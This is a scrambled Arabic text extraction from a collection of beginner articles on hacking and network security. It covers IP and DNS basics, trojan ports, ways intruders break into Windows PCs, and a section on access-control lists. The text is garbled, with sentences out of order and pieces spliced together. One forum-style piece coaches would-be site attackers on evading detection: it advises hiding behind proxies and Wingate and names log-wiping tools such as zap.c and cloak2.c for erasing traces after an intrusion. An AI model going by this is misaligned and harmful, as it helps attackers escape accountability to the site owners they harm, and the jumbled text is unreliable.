آخر‬ ‫خلل نظام المحادثة‪ ،‬ولها تلحظ أن برامج المحادثة غالبا ما تعطيك رقم ‪ IP‬للشخاص الخرين ناقصا‬ ‫)بالشكل التالي ‪ ( XXX.com‬يكفي ان تكتبها في المستعرض الذي سيقوم بإرسالها‬ ‫لخادم السماء ‪ DNS‬والذي سيقوم بتحويلها الى عنوان الجهازحتى يستطيع جهازك التخاطب مع خادم‬ ‫الويب الخاص بشبكة سي ان ان‪ .1‬في حالة كون الشخص‬ ‫مشرفا على الغرفة التي‬ ‫‪10‬‬ .222.333‬وهذا فيه نوع من الحماية للمستخدمين حتى ل يتمكن الهاكرز من‬ ‫معرفة رقم الـ ‪ IP‬الكامل‬ ‫للمستخدم ومن ثم‬ ‫استخدامه للوصول إليه‪.cnn.‬بالطبع هناك عدة استثناءات سنتحدث عنها في وقتها‪ .‬فالذاكرة البشرية غير قادرة على حفظ الكثير من الرقام ومن هنا‬ ‫تم التوجه للـ ‪ DNS‬وهو عبارة عن جهاز خادم يحفظ معلومات هي عبارة عن أسماء الجهزة وأرقام ‪IP‬‬ ‫الخاصة بها حيث يقوم المستخدمون بإرسال اسم الموقع الى مزود ‪ DNS‬ليرد عليهم بعنوانه )رقم ‪IP‬‬ ‫الخاص به( فلتدخل على موقع ‪ www.53.‬في نظام الشبكات يسمى‬ ‫هذا التخاطب بالتصال ‪ ..

‬‬ ‫قائمة ببعض المنافذ والتطبيقات المقابلة لها‬ ‫المنفذ‬ ‫‪25‬‬ ‫المنفذ‬ ‫‪31337‬‬ ‫‪1720.‬‬ ‫‪ .‬وأيضا احذر من‬ ‫استقبال الملفات ممن ل تعرفهم أو ممن يعرض عليك إرسال الملفات بدون سبب‪ ،‬لن غرضه الوحيد ربما‬ ‫يكون الحصول على رقم الي بي الخاص بك‪.‫دخلت بها )المشرف هو الشخص الذي أنشأ الغرفة أو الشخص الذي تم منحه الصلحية من قبل من أنشأ‬ ‫الغرفة(‪ ،‬حيث أن المشرف يحصل على رقم الـ ‪ IP‬الكامل لكل شخص دخل غرفته‪.networksolutions.‬‬ ‫من صاحب الموقع ؟‬ ‫لبد أنك قد زرت موقعا وأعجبك‪ ،‬وتساءلت في نفسك من هو صاحب هذا الموقع )سواء كان شخصا أو‬ ‫مؤسسة( ل داعي لن تحتار بعد الن فيكفي أن تذهب للموقع‬ ‫‪ /www.1503‬‬ ‫التطبيق المقابل‬ ‫‪FTP 21‬‬ ‫ارسال بريد الكتروني‬ ‫‪SMTP‬‬ ‫‪11‬‬ ‫التطبيق المقابل‬ ‫تروجان ‪BackOrifice‬‬ ‫برنامج ‪Netmeeting‬‬ .‬‬ ‫مما ذكر أعله‪ ،‬احذر من الدخول للغرف التي تكون مخصصة للهاكرز‪ ،‬حيث أنه المشرف )وهو هاكر في‬ ‫الغالب( سيحصل على رقم ‪ IP‬الخاص بك مباشرة مما يعرض جهازك لخطر الختراق‪ .com‬وستحصل على اسم الشخص الذي قام بتسجيل الموقع وعنوانه البريدي‬ ‫ورقم هاتفه والفاكس وغيرها من المعلومات الخرى المتعلقة بالموقع‪ .2‬في حالة تبادلك الملفات مع شخص في نظام المحادثة‪ :‬فمزود المحادثة يقوم بدور الوسيط في نقل‬ ‫النصوص فقط‪ ،‬أما في حالة نقل الملفات فإنه يقوم بإعطاء كل الجهازين رقم الـ ‪ IP‬الخاص بالجهاز الخر‬ ‫بحيث يقومان بنقل البيانات بينهما بشكل مباشر‪.‬بالطبع فهذه المعلومات قد قام صاحب‬ ‫الموقع بإدخالها عندما قام بحجز اسم الموقع‪.com/cgi-bin/whois/whois‬وتقوم بإدخال اسم الموقع من دون‬ ‫‪ ) www‬مثل ‪( wagait.

‫‪80‬‬ ‫‪110‬‬ ‫‪139‬‬ ‫المحادثة ‪Chat‬‬ ‫‪6667‬‬ ‫‪ 12345.20034‬تروجان ‪NetBus‬‬ ‫ويب ‪Web‬‬ ‫استقبال بريد الكتروني‬ ‫‪POP3‬‬ ‫مشاركة ملفات في‬ ‫ويندوز‬ ‫انتهى‪،،،‬‬ ‫‪12‬‬ .

‬وقد‬ ‫انتشرت هذه النوعية بكثرة في النترنت‪ ،‬نظرا لسهولة انخداع المستخدم بها ونظرا لما تعطيه للمخترقين من‬ ‫إمكانيات تصل في بعض الحيان إلى التحكم شبه الكامل في جهاز المستخدم الضحية‪.‬بالطبع فإننا سنلمح لهذه البرامج تلميحا‪ ،‬ولن نذكر أسماءها وذلك حتى ل يتم إساءة‬ ‫استغللها‪.‫"مفاهيم خاصة بشبكات النترنت )الجزء الثاني("‬ ‫لكي تعرف كيف تحمي نفسك من أي خطر يجب أول أن تعرف ما هو هذا الخطر ومن ثم يصبح بإمكانك أن‬ ‫تعرف كيف تحمي نفسك من هذا الخطر‪ ،‬فمثل لكي نحمي أنفسنا من اللصوص‪ ،‬يجب أن نعرف خطرهم‪ .‬ومن‬ ‫ثم يجب أن نعرف كيف نتقي شرهم‪ ،‬فنحن نقفل البواب لمعرفتنا أن اللصوص قد يدخلون منها في حال‬ ‫تركناها مفتوحة‪ .‬‬ ‫لعل من أشهر التروجان المنتشرة في النترنت التروجان المسماة بـ "نت باس" ‪ NetBus‬و" باك اوريفيس‬ ‫" ‪ Back Orifice‬و "سب سيفين " ‪ .‬‬ ‫‪ -1‬الفيروسات )‪:(Viruses‬‬ ‫عندما يتم التحدث عن الخطار الموجودة في الحاسب اللي‪ ،‬تتوجه أذهان المستمعين تلقائيا للتفكير في‬ ‫الفيروسات‪ ،‬نظرا لنتشارها وقوة تأثيرها التخريبية على أجهزة الحاسب اللي‪ .‬‬ ‫في الحلقة السابقة تكلمنا عن بعض مصطلحات ومفاهيم الشبكات‪ ،‬والتي تساعدك على معرفة ما سنتحدث‬ ‫عنه في هذه الحلقة وهي الطرق والبرامج التي تمكن المخترقين )الهاكرز( من القيام بعملية الختراق لجهزة‬ ‫المستخدمين لشبكة النترنت‪ ،‬سواء كان هذا الختراق لغرض التجسس وسرقة الملفات أو لغرض التخريب‬ ‫ومسح الملفات‪ .‬‬ ‫تتشابه هذه التروجان في الوظائف التي تمكن المخترق من القيام بها‪ ،‬وتتراوح خطورة الوظائف من‬ ‫التجسس على الجهاز ) مثل سرقة الملفات والبريد اللكتروني وكلمات السر المختلفة( حتى العبث بجهاز‬ ‫المستخدم بإخراج القراص المضغوطة )‪ (CD-ROM‬أو إظهار رسالة مضحكة للمستخدم أو تشغيل ملف‬ ‫صوت وغيرها من الوظائف الخرى المزعجة‪.‬‬ ‫‪ -2‬التروجان )‪:(Trojans‬‬ ‫التروجان أو أحصنة طروادة هي البرامج التي يكون في ظاهرها أنها تقوم بأداء وظيفة مفيدة للمستخدم‬ ‫ولكنها في الحقيقة وخلف الكواليس تقوم بعمل وظيفة أخرى )غالبا مخربة( بدون علم المستخدم‪ .‬كذلك هو الحال بالنسبة للحاسب اللي‪ ،‬فلكي تعرف كيف تحمي نفسك من شرور الهاكرز‪،‬‬ ‫يجب أن تعرف كيف يقومون باختراق جهازك‪ ،‬وما هي البواب التي يدخلون منها إلى أجهزتنا‪.‬‬ ‫‪13‬‬ .‬ولعله من المناسب عدم‬ ‫الطالة في الحديث عن الفيروسات‪ ،‬فالغالبية )إن لم يكن الكل( يعرفون خطرها وتأثيرها على أجهزة‬ ‫المستخدمين‪. SubSeven‬وطريقة عملها متشابهة وهي أن يقوم المخترق‬ ‫بإخفاء التروجان في أحد الملفات والتي يقوم المستخدمون الخرون بسحبها ظنا منهم بأن هذه الملفات تقوم‬ ‫بوظائف مفيدة لهم‪ ،‬وعندما يقوم المستخدم بتنفيذ هذا الملف فإنه يقوم وبدون علمه بتركيب خادم للتروجان‬ ‫داخل جهازه بحيث يتمكن المخترق )باستخدام برنامج عميل للتروجان ‪ (client‬من التحكم في جهاز‬ ‫المستخدم الضحية‪.

‫صورة تبين واجهة برنامج نت باس ويظهر فيها الوظائف المختلفة التي يمكن للهاكر القيام بها‬ ‫‪ -3‬المشاركة في الطباعة والملفات في ويندوز‪:‬‬ ‫من المعروف أن نظام ويندوز يسمح للمستخدم بتحديد أحد المجلدات أو القراص الصلبة في جهازه للمشاركة‬ ‫من قبل أشخاص آخرين على الشبكة‪ .‬بالطبع فإن هذه الخاصية مفيدة جدا ولها تطبيقات كثيرة نافعة‬ ‫للمستخدم‪ ،‬ولكن عندما تكون متصل بالنترنت فإن كل من يرى جهازك سيستطيع أن يرى هذه المجلدات التي‬ ‫وضعتها للمشاركة ويبقى العائق الوحيد للدخول عليها هو الحصول على كلمة السر‪ .‬وما يزيد الطين بلة أن بعض المستخدمين يقومون‬ ‫بمشاركة القرص الصلب بكامله !! وبعضهم يستخدم كلمة سر بسيطة من حرف أو حرفين !! مما يسهل‬ ‫المهمة على الهاكر ويجعله يحتار في أي الملفات يسرق وأيها يترك !!‬ ‫‪14‬‬ .‬وبعد الحصول على قائمة بهذه‬ ‫الجهزة فإنه ما على المخترق إل أن يقوم بتشغيل برنامج يقوم بمحاولة "تخمين" كلمة السر )ويوجد أيضا‬ ‫الكثير من البرامج من هذا النوع( والتي تقوم بتجريب آلف الكلمات والتي تم تخزينها مسبقا في ملف حتى‬ ‫تصل إلى كلمة السر الخاصة بالمجلد الموضوع للمشاركة‪ .‬طبعا قد تتساءل "كيف‬ ‫يستطيع الخرون الوصول لي ؟ وأنا جهاز ضمن المليين من الجهزة على النترنت" يؤسفني أن أقول لك‬ ‫أنه يتوافر الكثير من البرامج )وكما قلنا فلن نذكر أسماءها حتى ل يساء استخدامها ( والتي تمكن للشخص‬ ‫من البحث عن المجلدات الموضوعة للمشاركة في أجهزة المستخدمين‪ .

‫أحد البرامج التي تقوم بالبحث عن المجلدات الموضوعة المشاركة‬ ‫‪ -4‬سرقة كلمة السر المخزنة‪:‬‬ ‫يقوم نظام ويندوز بتخزين كلمة السر في ملف وذلك لكي يسترجعها بسرعة في حالة الحاجة إليها‪ ،‬بالطبع‬ ‫فإن كلمة السر يتم تخزينها بشكل مشفر)‪ ، ( encrypted‬ولكن ل شيء يستعصي على الهاكرز‪ .‬وهو يعتبر من أكثر البرامج شعبية بين مستخدمي النترنت‬ ‫نظرا لما يقدمه من خدمات تسهل التواصل بين المستخدمين‪ .‬ولكن هذه البرامج قد تحتوي على العديد من الثغرات المنية التي تكون الباب‬ ‫المشرع الذي يستخدمه الهاكر للدخول في جهازك و إيذائك ! ومن هذه البرامج برنامج ‪ ICQ‬الشهير الذي‬ ‫يستخدمه المليين من المستخدمين في النترنت‪ .‬ولكنه أيضا من أكثر البرامج شعبية للهاكرز‬ ‫نظرا لما يقدمه من إمكانيات للتخريب والعبث بأجهزة ضحاياهم‪ .‬فحين‬ ‫حصول الهاكر على هذا الملف )والذي ينتهي بالمتداد ‪ ( PWL‬فإن كلمة السر الخاصة بجهازك هي ملك له‬ ‫وذلك لوجود العديد من البرامج التي تقوم بفك تشفير هذا الملف والحصول على كلمة السر‪ .‬فيوجد في النترنت العديد من البرامج التي‬ ‫تقوم بمهاجمة المستخدمين لهذا البرنامج‪ ،‬ويختلف تأثير هذه البرامج من الحصول على رقم ‪ IP‬الخاص‬ ‫بالمستخدم إلى القيام بإرسال كمية هائلة من البيانات لديه حتى يتوقف الجهاز عن الستجابة للمستخدم مما‬ ‫يضطره للقيام بعملية إعادة للتشغيل!‬ ‫‪ -6 -6‬المواقع المشبوهة‪:‬‬ ‫من فترة لخرى يتم اكتشاف الكثير من الثغرات المنية في المتصفحات ويتم استغلل هذه الثغرات بشكل كبير‬ ‫من قبل أصحاب مواقع الهاكرز‪ .‬‬ ‫‪ -5‬برامج وتطبيقات النترنت‬ ‫إن تطبيقات النترنت ليست مجرد متصفحات فحسب ! بل إن هناك العديد من التطبيقات والبرامج الخرى التي‬ ‫يتم استخدامها في النترنت‪ .‬بالطبع فإن نظام‬ ‫ويندوز ‪ 98‬يحتوي على تشفير أقوى من الذي كان موجودا في نظام ويندوز ‪ ، 95‬ولكنها مسألة وقت حتى‬ ‫يقوم الهاكرز بإيجاد برنامج يقوم بكسر هذا التشفير‪.‬لذا يجب عليك الحذر عند زيارة المواقع التي يشتبه في كون أصحابها من المخترقين‬ ‫نظرا لقدرة أصحاب المواقع على وضع بريمجات في مواقعهم لستغلل الثغرات المنية في متصفحك والدخول‬ ‫‪15‬‬ .‬هذه الثغرات قد تمكن المخترق من الحصول على بعض الملفات والمعلومات‬ ‫الشخصية من جهازك‪ .

‬‬ ‫بالطبع فإن ما ذكرناه في هذا المقال ل يشمل جميع الطرق التي يستخدمها الهاكرز ‪ ،‬ولكنه كاف لعطاء فكرة‬ ‫عن هذه الطرق ورفع درجة الحذر لدى المستخدمين عن اتصالهم بالنترنت‪ ،‬مما يسهم في التقليل من‬ ‫احتمالية تعرضهم للختراق‪.‬‬ ‫في العدد القادم بإذن ال سنقوم بالتحدث عن الطرق والبرامج الدفاعية التي يجب على المستخدم استخدامها‬ ‫لتقاء الهاكرز و شرورهم‪.‬‬ ‫انتهى‪،،،‬‬ ‫"المن عبر النترنت"‬ ‫‪16‬‬ .‬وأبسط المثلة على ذلك ما يقوم به بعض المخربون من وضع بريمج )‪ (script‬يقوم بتكرار‬ ‫تشغيل برنامج المتصفح وفتح نوافذ جديدة حتى تنتهي موارد النظام ويصبح ل يستجيب للمستخدم مما‬ ‫يضطره لعادة تشغيل الجهاز ! بالطبع فإن هذه الثغرة تم تلفيها في متصفح إنترنت اكسبلورر ‪ 4‬وما فوق‬ ‫ولكنها تعطي مثال بسيطا للتخريب الذي ممكن أن يقوم به المخترقون‪.‫إلى جهازك‪ .‬‬ ‫‪ -7‬الخدمات الضافية‪:‬‬ ‫يشتمل نظام التشغيل على بعض الخدمات الضافية التي قد ل يحتاجها المستخدم والتي قد تكون المدخل إلى‬ ‫جهازك‪ ،‬فمثل بعض الصدارات من نظام ويندوز تحتوي على خادم ويب وخادم ‪ FTP‬وخادم بريد إلكتروني )‬ ‫‪ (SMTP‬وهي ل تستخدم من قبل غالب المستخدمين ولكنها تحتوي في أغلب الحيان على ثغرات أمنية‬ ‫تمكن المخترقين من العبث بجهازك‪ .‬لذا فمن المستحسن أثناء تركيب نظام التشغيل أن يقوم المستخدم بإلغاء تركيب هذه‬ ‫الخدمات عندما ل يكون محتاجا لها وفي حالة كان المستخدم محتاجا لها‪ ،‬فمن المستحسن إيقاف تشغيلها عن‬ ‫اتصاله بالنترنت حتى ل يكون المنفذ الذي تعمل عليه هذه البرامج مفتوحا مما يسد الطريق على المخترقين‬ ‫الذي يريدون استغلل هذه الخدمات للدخول في جهازك‪.‬ويتم دائما إصدار تعديلت لهذه المشاكل المنية ولكن أغلب المستخدمين‬ ‫ل يقومون بتركيبها‪ .

.....‬و نفس الشيئ عن طريق التلنت‪.‬‬ ‫‪17‬‬ .‬بيفتحوا ال ‪ dos‬او ‪ .‬لقد تم اختراقك!!!‬ ‫حتى لما تستخدم امر بسيط مثل‪ /FTP ftp://hostname:‬في الدوس عندك و تدوس انتر‬ ‫او عندك ‪ GFI LANguard network security scanner‬و عملت سكان على سايت و لقيت كذا‬ ‫بورت مفتوح و منهم بورت ‪ .WTMP‬يسجل كل دخول\خروج‪ ،‬مع ميعاد الدخول\الخروج بالضافه الى ال ‪ host‬و ‪tty‬‬ ‫‪.UTMP‬من ‪ Onlne‬في هذه اللحظه‬ ‫‪.‬لو معاه شويه فلوس هيعرف!او حتي يخترق البروكسي‬ ‫سيرفر و هيجيبك ‪ .(LOG.FILES) 1‬‬ ‫ايه بقى ال ‪ LOG‬ده؟‍؟‬ ‫ال ‪ log files‬ديه بتسجل كل شئ عن كل شخص اتصل بالجهاز)‪ (loged in‬و يحصلوا على معلومات‬ ‫مثل‪:‬‬ ‫يرون متى عملت الهاكينج بالضبط‬ ‫من اي موقع اتيت‬ ‫فضلت اد ايه ‪online‬‬ ‫ال ‪ IP Address‬بتاعك >>>>>>>‬ ‫ال ‪) host name‬اسم الجهاز(‬ ‫القاره‬ ‫الدوله‬ ‫المدينه‬ ‫المتصفح‬ ‫نظام التشغيل‬ ‫ال ‪screen resolution‬‬ ‫الوان الشاشه‬ ‫مزود الخدمه الخاص بك)‪>>>>(ISP‬‬ ‫هناك ‪ 3‬انواع ‪ log files‬مهمه‪:‬‬ ‫‪ .LASLOG‬من اي جاء الدخول\خروج‬ ‫و الكثير الكثير!! لذا لو الدمن اراد ان يلقي نظره عليهم )‪ (log.‬هذا يعني‬ ‫انه تم اختراقك!!‬ ‫ده عشان لما بتعمل ‪ log in‬باوامر ‪ ftp‬بسيطه زي‪ .‬ديه مش ثغره!‪ .cd lcd dir ls :‬و اي حاجه تانيه‬ ‫لن مجرد ماتعمل ‪ log in‬في حاجه اسمها ‪LOGS.‬‬ ‫لكن تقدر ايضا تستخدم شيئ اسمه‪-: Wingate ...--so on--‬‬ ‫يقدر يجيبك بس هيحتاج فلوس كثير و وقت اكثر!!لكن في النهايه يقدر‪....21‬بتدوس عليه و تتصل بالموقع‪. it reboots ..‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<JawaDal :‬‬ ‫>ةةةةةةة‪:‬‬ ‫‪<z3r0‬‬ ‫هناك الكثير الذي يجب ان تعرفوه قبل ان تفكروا في تعلم اختراق المواقع و السيرفرات‬ ‫حسناا ‪here we G0‬‬ ‫الكثير من الناس يعملوا هاكينج من غير ما يعرفوا‪ .. (down‬‬ ‫ربما تقول‪ :‬مفيش مشكله انا هاستخدم بروكسي! بس ادي حلجه لزم تعرفها عن البروكسيهات‬ ‫جهازك‪<--‬خادم البروكسي‪<--‬الموقع‪--FTP--‬تلنت او اي شئ اخر!‬ ‫لو اخترقت موقع و الدمن عاوز يعرف انت مين‪..files‬سوف يوقع بك)‪track you‬‬ ‫‪..‬نفس الكلم لو بتستخدم اكثر من بروكسي‬ ‫جهازك‪<--‬خادم البروكسي الول‪<--‬خادم البروكسي الثاني‪<--‬الثالث‪..shell account‬يكتبوا شويه‬ ‫اوامر و بووم‪.

.‬مثل ال ‪ ....‬يجب‬ ‫ان تجد الجابه هذا هو المهم‪ !!!.‬هذه الجابه يجب ان يعرفها الجميع قبل ان يتعلم‬ ‫الهاكينج‬ ‫‪-1‬كيف تستخدم ال ‪ wingate‬؟ و اين نجده؟‬ ‫كيف نمسح اللوقز؟ و كيف نجدهم؟ و كيف نتأكد ان كل شئ على ما يرام؟!و كيف نتأكد اننا لم نترك اي اثار‬ ‫‪ tracks‬خلفنا؟‬ ‫ها هو برنامج اعرفه‪ :‬و اسمه ‪log modifier‬‬ ‫‪ah-1_0b...‬نحتاج بعض الشخاص الذكياء ليعلمونا كيف نستخدمه و اين نجده؟!‬ ‫ماذا ايضاا‪.‬لقد خصلت عليه من المدرسه‪ .c wtmped.‬‬ ‫انتهى‪،،،‬‬ ‫"أمن الشبكات"‬ ‫‪18‬‬ .‬فائده ال ‪ Wingate‬انه سيخفي‬ ‫ال ‪ IP‬عن الكمبيوتر الذي ستتصل به!!‬ ‫لكن للسف هذا كل ما اعرفه عنه‪ 1..c marryv11...‬اذهب لجوجل و اكتب ‪ how to Stay anonymous on the web‬او ‪how to‬‬ ‫‪secure to secure my computer‬‬ ‫او زور موقع امني جيد و ابحث عن شئ كهذا ‪ ..‬و سألت سؤالين او اكثر عن كيفيه البقاء ‪anonymous‬‬ ‫عالنت و عن استخدام البروكسيز و بعض الناس جاوبوني‪ .pgpi.‬‬ ‫و ل تنسى ال ‪ Preety Good Privacy (PGP)d‬انه مجاني ‪ .c‬‬ ‫‪zap.‬و لست الوحيد الذي يحتاج الجابه ‪ .tar clear..c‬‬ ‫==================================================‬ ‫==========================================‬ ‫هذا يا اخي كل ما عرفته في اخر اسبوعين‪ ...org :‬‬ ‫‪ ok‬اظن ان هذا كل ما يمكنني كتابته لكن هناك الكثير لكن يجب ان تبحث عنه!‬ ‫ارجوا ان يعلمك هذا الدرس شيئا يا اخواني‬ ‫لكن لدي سؤال الن ‪ .spyware‬استخدم ‪ firewall‬مثل ال ‪ .c invisible..‫‪ Wingate‬هو بروكسي يسمح بمشاركه كونكشن انترنت واحد او اكثر‪ .‬و الملفات الشخصيه و اللوق( انا افعل‬ ‫هذه الشياء كل يوم قبل ان ادخل عالنت!! لدي برنامج رائع اسمه ‪ windows washer‬يجب ان يكون‬ ‫عندك‪ ...c cloak2.‬يجب ان يكون عندك لو كنت تريد‬ ‫اختراق موقع و تترك ايميلك فيه!‬ ‫تستطيع ان تحصل عليه من‪/http://www.web‬و كيف تؤمن‬ ‫جهازك؟!!‪.....‬لذا ارجو يا اخي ان تبحث في هذا المجال اول ثم بعدها تتعلم الختراق‪.‬لكن بالنهايه ليس المهم كم سؤال سألت ‪ ..c wzap.‬‬ ‫و الكثير‪ .‬و انا متأكد انك ستجد الكثير ‪.‬قبل كل شئ يجب ان تعرف كيف تظل ‪ anonymous‬على ال ‪ . zone alarm‬امسح ملفات‬ ‫الهيستوري)كالكوكيز و النترنت هيستوري و ملفات النترنت المؤقته‪.‬اممممممــم‬ ‫اه تذكرت!!‪ .‬سرقته هاهاها‪.

‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪:‬ةةةةةة<‬ ‫فى هذا الموضووع سأتناول بعض طرق الحماية نقل عن كتاب ‪.‬‬ ‫‪ -8‬تزويد المستخدمين بحقوق ‪ Rights‬تحدد النشطة و العمليات المسموح لهم إجراءها على النظام‪.‬‬ ‫‪ -2‬وصف لعلقة الولوج الى الشبكة بأمنها‪.‬‬ ‫‪ -4‬الموارد‪.‬‬ ‫‪ -4‬شرح لمكونات ‪.‬‬ ‫‪ -3‬البيانات‪.ACL‬‬ ‫‪ -5‬شرح لعملية تفحص التراخيص‪.‬‬ ‫لذلك أرجو سماع وزاع ضميركم ‪.‬‬ ‫و يتم تنظيم المن وفقا لنوع الشبكة ‪ ،‬ففي شبكات الند للند كل جهاز يتحكم في أمنه الخاص ‪ ،‬بينما يتحكم‬ ‫المزود في أمن شبكات الزبون المزود‪.‬‬ ‫وهذا لفتقار هذا القسم لمواضيع مثل هذه ‪.‬‬ ‫‪ -4‬تشفير البيانات عند الحاجة أما مقاييس التشفير فتضعها وكالة المن الوطني المريكية ‪National‬‬ ‫‪.‬‬ ‫‪ -7‬إعطاء تصاريح ‪ Permissions‬للمستخدمين للوصول للبيانات و المعدات كل حسب طبيعة عمله و في‬ ‫هذه الحالة يجب مشاركة البيانات و المعدات للسماح للخرين باستخدامها‪.‬‬ ‫‪ -3‬عمليات الشبكة‪.‬‬ ‫أي شبكة قد تكون عرضة للوصول غير المرخص لي مما يلي‪:‬‬ ‫‪ -1‬المعدات‪.‬‬ ‫‪19‬‬ .‬‬ ‫تعتمد درجة أمن الشبكة على مدى حساسية البيانات المتداولة عبر الشبكة‪.(Security Agency (NSA‬‬ ‫‪ -5‬تزويد المستخدمين بأجهزة ل تحتوي على محركات أقراص مرنة أو مضغوطة أو حتى أقراص صلبة ‪ ،‬و‬ ‫تتصل هذه الجهزة بالمزودات باستخدام رقاقة إقلع ‪ ROM Boot Chip‬و عند تشغيل هذه الجهزة يقوم‬ ‫المزود بتحميل برنامج القلع في ذاكرة ‪ RAM‬للجهاز ليبدأ بالعمل‪.‬‬ ‫‪ -3‬حماية السلك النحاسية و إخفاءها عن العين لنها قد تكون عرضة للتجسس‪.‬‬ ‫‪ -2‬التأكد من أمن المعدات و صعوبة الوصول اليها من قبل غير المخولين‪.‬‬ ‫‪-6‬استخدام برامج لتسجيل جميع العمليات التي يتم إجراؤها على الشبكة لمراجعتها عند الضرورة‪.‬‬ ‫‪-------------------------------------------------------‬‬‫‪ -1‬عرض لبعض المخاطر المنية التي قد تتعرض لها الشبكة و كيفية الوقاية منها‪.‬‬ ‫‪ -3‬كيفية حماية الموارد بواسطة تراخيص الوصول‪.‬‬ ‫و هناك بعض الجراءات التي تساعد في المحافظة على أمن الشبكة‪:‬‬ ‫‪ -1‬التدريب المتقن للمستخدمين على التعامل مع إجراءات المن‪.

‬‬ ‫كما تستطيع تحديد درجة الوصول هل هي للقراءة فقط أم وصول كامل أم وفقا لكلمة السر‪.‬‬ ‫عند إدخال السم و كلمة المرور يتم تمرير هذه المعلومات الى مدير أمن الحسابات ‪Security‬‬ ‫‪ (Accounts Manager (SAM‬فإذا كان الولوج الى جهاز ‪ Workstation‬فإن المعلومات يتم‬ ‫مقارنتها مع قاعدة بيانات حسابات المن المحلية في الجهاز‪ ،‬أما إذا كان الولوج الى نطاق ‪ Domain‬فإن‬ ‫المعلومات يتم إرسالها الى مزود ‪ SAM‬الذي يقارنها مع قاعدة بيانات حسابات النطاق‪ ،‬فإذا كان اسم‬ ‫المستخدم أو كلمة المرور غير صالحين فإن المستخدم يمنع من الدخول الى النظام‪ ،‬أما إذا كانا صحيحين فإن‬ ‫‪20‬‬ .‬‬ ‫‪ -2‬تصاريح الوصول‪.‬أنظر الصورة‪.‫هناك نظامان أساسيان لعطاء التصاريح و الحقوق ‪:‬‬ ‫‪ -1‬المشاركة المحمية بكلمة مرور‪.‬‬ ‫في النظام الول يتم تعيين كلمة سر لكل من الموارد المطلوب مشاركتها و يتم الوصول لهذه الموارد فقط من‬ ‫قبل من لديه كلمة السر‪.‬‬ ‫في النظام الثاني يتم تعيين الحقوق و إعطاء التصاريح لكل مستخدم أو مجموعة مستخدمين ‪ ،‬و يكفي أن‬ ‫يدخل المستخدم كلمة المرور عند الدخول الى نظام التشغيل ليتعرف النظام على حقوق هذا المستخدم و‬ ‫التصاريح المتوفرة له‪ ،‬و يعتبر هذا النظام أكثر أمنا من النظام السابق و يعطي مدير الشبكة تحكما أكبر بكل‬ ‫مستخدم‪.

(Access Control Entry (ACE‬‬ ‫يتم إنشاء ‪ ACE‬عند منح التصريح لستخدام المورد و تحتوي على ‪ SID‬للمستخدم أو مجموعته الممنوحة‬ ‫التصريح بالضافة الى نوع التصريح‪ ،‬فلو افترضنا أن مدير مجموعة ما قد ُمنح تصريح قراءة و تصريح‬ ‫كتابة لملف ما فإن ‪ ACE‬جديد يتم إنشاؤه ثم إضافته الى ‪ ACL‬الخاص بالملف و سيحتوي ‪ ACE‬على‬ ‫‪ SID‬لمدير المجموعة بالضافة الى تصريح قراءة و تصريح كتابة‪.‬‬ ‫‪ -2‬تصريح تنفيذ للتطبيقات‪.No Access‬‬ ‫و هكذا عندما يحاول مستخدم ما الوصول الى مورد ما يتم مقارنة ‪ SID‬الخاص به مع ‪ SIDs‬في كل ‪ACE‬‬ ‫من ‪ ACL‬للمورد‪.‬‬ ‫كما أنه يتم إصدار ‪ Access Token‬عند محاولتك التصال من جهازك بجهاز آخر على شبكتك و يطلق‬ ‫على هذا الجراء الولوج عن بعد ‪.Remote Logon‬‬ ‫من المور التي يجب مراعاتها عند الحديث عن أمن الشبكة هو المحافظة على أمن الموارد مثل الطابعات و‬ ‫محركات القراص و الملفات و التي يقوم مدير الشبكة بتعيين تصاريح لستخدام هذه الموارد‪.‬‬ ‫هناك نوعان ل ‪: ACE‬‬ ‫‪ -1‬الوصول مسموح ‪.‬‬ ‫ملخص الدرس‪:‬‬ ‫‪21‬‬ .‬‬ ‫‪ -3‬المتيازات ‪ Privileges‬و هي تمثل الحقوق الممنوحة لحسابك‪.‬‬ ‫‪ -4‬ممنوع الستخدام ‪.‬‬ ‫في ويندوز ‪ NT‬و ويندوز ‪ 2000‬يتم ترتيب ‪ ACE‬بحيث تكون ‪ AccessDenied ACEs‬قبل‬ ‫‪ ، AccessAllowed ACEs‬فإذا وجد ‪ SID‬خاصتك في أي من ‪AccessDenied ACEs‬‬ ‫فستمنع من الوصول الى المورد و إل فسيبحث في ‪ AccessAllowed ACEs‬للتأكد من الحقوق‬ ‫الممنوحة لك فإن لم يعثر على ‪ SID‬مطابق لخاصتك فستعرض رسالة تحذير تمنعك من الوصول للمورد‪.No Access‬‬ ‫و التصاريح ممكن منحها لمستخدم أو مجموعة من المستخدمين و هذا ٍأسهل‪.‬‬ ‫‪ -3‬تصريح كتابة و يسمح بالتعديل في محتوى الملفات‪.‬‬ ‫يمتلك كل مورد من الموارد قائمة تحكم بالوصول ‪ (Access Control List (ACL‬و كل معلومة يتم‬ ‫إدخالها في ‪ ACL‬يطلق عليها ‪.AccessAllowed‬‬ ‫‪ -2‬الوصول ممنوع ‪ AccessDenied‬و يتم إنشاؤها إذا كان تصريح الوصول هو ‪.‬‬ ‫و من التصاريح التي قد تعطى للوصول الى الملفات ما يلي‪:‬‬ ‫‪ -1‬تصريح قراءة و يسمح لك بعرض و نسخ الملفات‪.‫نظام المن الفرعي يقوم بإصدار بطاقة ولوج ‪ Access Token‬تعرف النظام بالمستخدم فترة ولوجه و‬ ‫تحتوي هذه البطاقة على المعلومات التالية‪:‬‬ ‫‪ -1‬المعرف المني ‪ (Security Identifier (SID‬و هو رقم فريد خاص بكل حساب‪.‬‬ ‫‪ -2‬معرفات المجموعة ‪ Group SIDs‬و هي التي تحدد المجموعة التي ينتمي لها المستخدم‪.

‬‬ ‫هناك نظامان أساسيان لعطاء التصاريح و الحقوق ‪:‬‬ ‫‪ -1‬المشاركة المحمية بكلمة مرور‪.‬‬ ‫انتهى‪،،،‬‬ ‫"مصطلحات مهمة للمبتدئين في اختراق المواقع"‬ ‫‪22‬‬ .‫هناك بعض الجراءات التي يجب اتخاذها للمحافظة على أمن الشبكة و منها‪:‬‬ ‫تدريب المستخدمين ‪ ،‬حماية المعدات ‪ ،‬تشفير البيانات ‪ ،‬استخدام أجهزة عديمة القراص ‪ ،‬مراقبة العمليات‬ ‫التي تجرى على الشبكة‪.‬‬ ‫‪ -2‬تصاريح الوصول‪.

